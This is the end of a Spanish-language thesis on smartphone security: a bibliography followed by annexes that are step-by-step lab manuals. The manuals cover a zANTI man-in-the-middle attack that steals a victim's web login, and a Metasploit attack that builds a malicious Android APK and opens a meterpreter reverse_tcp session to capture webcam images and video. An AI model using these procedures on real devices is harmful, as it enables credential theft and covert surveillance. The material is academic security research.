https://www.aboutespanol.com/parametros-reales-para-identificar-gamas-

de-los-celulares-580836

Correa, M. (2014). Composición del sistema operativo móvil iOS de Apple y el

hardware y software que lo utilizan.

Duarte, E. (2012, julio 11). Las 8 Mejores Herramientas De Seguridad Y Hacking.

Recuperado 31 de diciembre de 2017, a partir de

http://blog.capacityacademy.com/2012/07/11/las-8-mejores-herramientas-

de-seguridad-y-hacking/

104

Durán, Á. J., Peinado, J. L., & Rosado, A. A. (2015). Comparación de dos

tecnologías de desarrollo de aplicaciones móviles desde la perspectiva

del rendimiento como atributo de calidad. Scientia et technica, 20(1).

El Tiempo, C. E. (2017). Huawei, Oppo y Vivo crecen más de 20 % en el

mercado de celulares. Recuperado 11 de diciembre de 2017, a partir de

http://www.eltiempo.com/tecnosfera/novedades-tecnologia/los-celulares-

mas-vendidos-de-2017-82648

Erreyes, D. M. (2017). Metodología para la selección de herramientas eficientes

y protocolos adecuados para mejorar la seguridad de los dispositivos

móviles.

García, C. (2017). Seguridad en smartphones: análisis de riesgos, de

vulnerabilidades y auditorías de dispositivos. Recuperado a partir de

http://openaccess.uoc.edu/webapps/o2/handle/10609/60705

Gartner. (2017). Gartner Says Worldwide Sales of Smartphones Grew 7 Percent

in the Fourth Quarter of 2016. Recuperado 10 de noviembre de 2017, a

partir de https://www.gartner.com/newsroom/id/3609817

GSMA. (2017). GSMA. Recuperado 25 de diciembre de 2017, a partir de

https://www.gsma.com/

Iván. (2016, enero 9). Qué es un benchmark y para qué nos puede servir.

Recuperado 14 de diciembre de 2017, a partir de

https://elandroidelibre.elespanol.com/2016/01/que-es-un-benchmark.html

Mahecha, M. A., & Tavera, W. S. (2016). Identificación de los ataques más

realizados en un sitio concurrido por personas que utilizan sus

dispositivos móviles y determinación de las vulnerabilidades más

comunes en el sistema operativo Android.

105

Morales, J. C. (2012, octubre 1). SISTEMAS OPERATIVOS: Actividad 3:

Criterios de Planificación del CPU. Recuperado 14 de noviembre de

2017, a partir de http://juaanka.blogspot.com/2012/10/actividad-3-

criterios-de-planificacion.html

Morelo, J. S., & Betancur, D. (2013). Análisis forense al sistema Android afectado

por el malware Fakelookout y su solución.

Osorio, R. D., & Ramírez, C. A. (2011). Características y parámetros de la

seguridad para los Smartphones con sistema operativo Android.

Universidad Tecnológica de Pereira.

Prieto, J., Ramírez, R., Morillo, J. D., & Prieto, M. D. (2011). Tecnología y

desarrollo en dispositivos móviles. Universitat Oberta de Catalunya.

Roa, J. F. (2013). Seguridad informática. McGraw-Hill España.

Rodríguez, V. M., & Quimí, J. E. (2016). Implementación de un modelo para la

administración de movilidad empresarial, considerando sistemas android,

ios y windows phone (B.S. thesis). Espol.

Salellas, L. (2017). Glosario de términos técnicos de auditoria en seguridad.

Recuperado 5 de enero de 2018, a partir de

http://www.forodeseguridad.com/artic/discipl/4135.htm

Seguridadpc.net. (2017). ¿Qué son los Ciberdelincuentes? Recuperado 16 de

diciembre de 2017, a partir de http://www.seguridadpc.net/conceptos/los-

ciberdelincuentes.html

Solvetic Seguridad. (2017). ZANTI herramienta de hacking y seguridad desde

Android. Recuperado 31 de diciembre de 2017, a partir de

https://www.solvetic.com/tutoriales/article/1995-zanti-herramienta-de-

hacking-y-seguridad-desde-en-android/

106

StatCounter. (2017). Operating System Market Share Worldwide. Recuperado 24

de diciembre de 2017, a partir de http://gs.statcounter.com/os-market-

share

Thompson, I. (2008). DEFINICIÓN DE INFORMACIÓN - Promonegocios.net.

Recuperado 28 de noviembre de 2017, a partir de

https://www.promonegocios.net/mercadotecnia/definicion-

informacion.html

Villa, H. M. (2016). Desarrollo de una aplicación que permita el escaneo de las

vulnerabilidades en los dispositivos móviles Android para mitigar los

problemas de seguridad. Escuela Superior Politécnica de Chimborazo.

107

ANEXOS

108

ANEXO N° 1

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

CRONOGRAMA DEL PROYECTO

109

ANEXO 2

MANUAL TÉCNICO DE ATAQUES INFORMÁTICOS DESDE ZANTI

Procedimiento de instalación de Zanti

1. Rootear el teléfono Android con la aplicación KingRoot

Elaboración: Ruth Asqui

Fuente: KINGROOT

2. Descargar Zanti desde el navegador del móvil, porque la aplicación todavía no

está disponible en la Play Store de los teléfonos Android, pero si es compatible

para éste sistema operativo.

FIGURA N° 1

PANTALLA DE KINGROOT

110

Elaboración: Ruth Asqui

Fuente: Teléfono Samsung

3. Abrir Zanti y proceder hacer un mapeo de red local, para identificar a la víctima.

Seleccionamos el icono que está sombreado de amarillo y después aparecerá la

pantalla de Mapea tu red y seleccionamos en OK.

FIGURA N° 2

PANTALLA DE INSTALACIÓN DE ZANTI

111

Elaboración: Ruth Asqui

Fuente: Zanti

4. Seleccionamos la ip víctima en este caso es 192.168.100.17 del dispositivo

Android.

FIGURA N° 4

REDES CONECTADAS A LA RED

Elaboración: Ruth Asqui

Fuente: Zanti

FIGURA N° 3

PROCESO DE MAPEO DE RED

LOCAL

112

5. Seleccionar la Acción de ataque, en este caso es Man in the Middle

Elaboración: Ruth Asqui

Fuente: Zanti

6. Seleccionamos el botón que se encuentra en la parte derecha superior para

cambiar de OFF a ON; para habilitar las opciones de acceso que se presenta a

continuación y después seleccionar en Ver de la opción Pedidos registrados

FIGURA N° 5

PANTALLA DE ACCIONES DE ATAQUES EN ZANTI

113

Elaboración: Ruth Asqui

Fuente: Zanti

7. Seleccionar la página web que deseemos acceder de las sesiones que la

víctima ha accedido, en este caso seleccione el link de

http://www.cursodehackers.com

FIGURA N° 6

OPCIONES DE ZANTI DE LA VÍCTIMA

114

Elaboración: Ruth Asqui

Fuente: Zanti

8. A continuación, se observa el robo de usuario y contraseña de la página web

de la victima

La información accedida se encuentra en el Gráfico N° 12, en la sección de

integridad, donde se hicieron los ataques informáticos en Android

FIGURA N° 7

PÁGINAS WEB VISITADAS POR LA VÍCTIMA

115

Elaboración: Ruth Asqui

Fuente: Zanti

Para explicar los siguientes ataques realizados, ya se seleccionaron y activaron

con ON las acciones, en la pantalla de la Figura N°6 de OPCIONES DE ZANTI DE

LA VÍCTIMA

La activación de la opción Redirigir HTTP, lo cual no permite a la víctima acceder

a ninguna página web que desee y lo envía a una página que por defecto utiliza

Zanti.

La activación de la opción Reemplazar imágenes, permite que la víctima no

pueda observar la información real en la página que acceda ; sino obtendrá

información errónea porque aparecerá la imagen que el atacante inserto en Zanti.

También se activó la opción Insertar HTLM, en donde se escribe el mensaje que

él atacante desee que aparezca, cuando la víctima acceda a internet.

Todos los resultados se encuentran en las pantallas de los ataques informáticos

realizas tanto para Android e iOS.

FIGURA N° 8

PANTALLA DE ROBO DE USUARIO Y CONTRASEÑA DE LA VÍCTIMA

116

ANEXO 3

MANUAL TÉCNICO DE ATAQUES INFORMÁTICOS DESDE METASPLOIT

(KALI LINUX)

1. Descargar la máquina virtual de Kali Linux desde la página oficial y después

importarla desde VMware o VMbox. Se utilizó Kali-Linux-2017.1-vbox-amd64.ova

Elaboración: Ruth Asqui

Fuente: Kali Linux

2. Abrir el terminal de Kali Linux y ejecutar la siguiente línea de comando, para

saber nuestra dirección ip

# ifconfig

El resultado fue 192.168.1.150, esta dirección ip es del atacante

FIGURA N° 9

PANTALLA DE KALI LINUX

117

Conectar la máquina Anfitrión y Virtual a la misma red; esto se verifica haciendo

ping entre ellas.

3. Mapeo de red local desde Kali Linux con nmap para verificar los equipos activos

conectados a la red.

Abrir el terminal de Kali Linux y escribimos la siguiente línea de comando:

# nmap – sP 192.168.1.0-255

Se escribieron los 3 primeros Byte de la dirección ip y después .0-255.

Elaboración: Ruth Asqui

Fuente: Kali Linux

En la Figura N° 10, se observa las víctimas activas, para el ataque se eligió la ip

192.168.1.129 del teléfono Samsung J5 ya que es del sistema operativo Android.

FIGURA N° 10

VÍCTIMAS ACTIVAS EN LA RED LOCAL

118

4. Se procede a crear un virus para Android a continuación:

La línea de comando para crear el virus se encuentra en los ataques informáticos

que se realizó a Android; en la sección de Integridad y Confidencialidad con

Metasploit; lo cual se denota en el Grafica N° 13 del estudio.

5. El Virus creado que es un archivo App1.apk, se procede a guardar en la carpeta

de: Files/Other Locations/Computer/var/www/html

Elaboración: Ruth Asqui

Fuente: Kali Linux

FIGURA N° 11

VIRUS GUARDADO EN LA CARPETA HTML

119

6. Se continúa y se levanta el servidor Apache2 con el comando: # service

apache2 start

Elaboración: Ruth Asqui

Fuente: Kali Linux

7. Se instala el virus en el teléfono móvil, esto se observa en el Grafico N° 14 del

estudio, esto se encuentra en la sección de Ataques en Android. Para la

instalación del virus en el teléfono, se utilizó la ip 192.168.1.129 de la víctima; y

aplicar la ingeniería social.

FIGURA N° 12

SERVICIO APACHE2 INICIADO

120

Elaboración: Ruth Asqui

Fuente: Android

En la Figura N° 13, se observa la inyección del virus en Android llamado

MainActivity.

8. Abrir el terminal de Kali Linux y levantar metasploit con la línea de comando

# msfconsole

Elaboración: Ruth Asqui

Fuente: Kali Linux

FIGURA N° 13

VIRUS INSTALADO A LA VÍCTIMA

FIGURA N° 14

PANTALLA DE METASPLOIT ABIERTA

121

9. Abrir el handler para estar en escucha, cuando la víctima se conecte a

nosotros. A continuación, se ejecuta la siguiente línea de comando:

# use exploit/multi/handler

10. Set los parámetros de payload, mediante los siguientes parámetros Handler

estará en escucha, estos parámetros son donde creamos el archivo del virus

# set payload Android/meterpreter/reverse_tcp

# set lhost 192.168.1.150

# set lport 4321

11. Iniciar el exploit

Ejecutar la siguiente línea de comando, para estar en escucha de la víctima

# exploit

Elaboración: Ruth Asqui

Fuente: Kali Linux

FIGURA N° 15

ATACANTE EN ESCUCHA DE LA VÍCTIMA

122

12. Insertamos la línea de comando en meterpreter >?

Al insertar el signo de interrogación en el meterpreter, presionamos ENTER y se

desplazara la pantalla de los comandos que se puede acceder en Android

Elaboración: Ruth Asqui

Fuente: Kali Linux

13. Acceder a la información mediante los comandos de la Figura 16

webcam_snap

Captura la imagen que la cámara web está apuntando en ese momento.

FIGURA N° 16

LISTA DE COMANDOS DE ACCESO EN ANDROID

123

Elaboración: Ruth Asqui

Fuente: Kali Linux

webcam_stream

Reproduce una secuencia de videos de la cámara web

Elaboración: Ruth Asqui

Fuente: Kali Linux

Elaboración: Ruth Asqui

Fuente: Kali Linux

FIGURA N° 17

CAPTURA DE IMAGEN DE LA CÁMARA WEB

FIGURA N° 18

GRABACIÓN DE VIDEO

124

Así se puede seguir mostrando la información del teléfono Android, tan solo con

ejecutar las líneas de comandos de la Figura N° 16. Puede seguir ejecutando las

líneas de comando que se requiera, por parte del autor deja en constancia la

información accedida y adquirida en el presente anexo y también en la sección de

Ataques en Android en el Gráfico N° 18 del proyecto.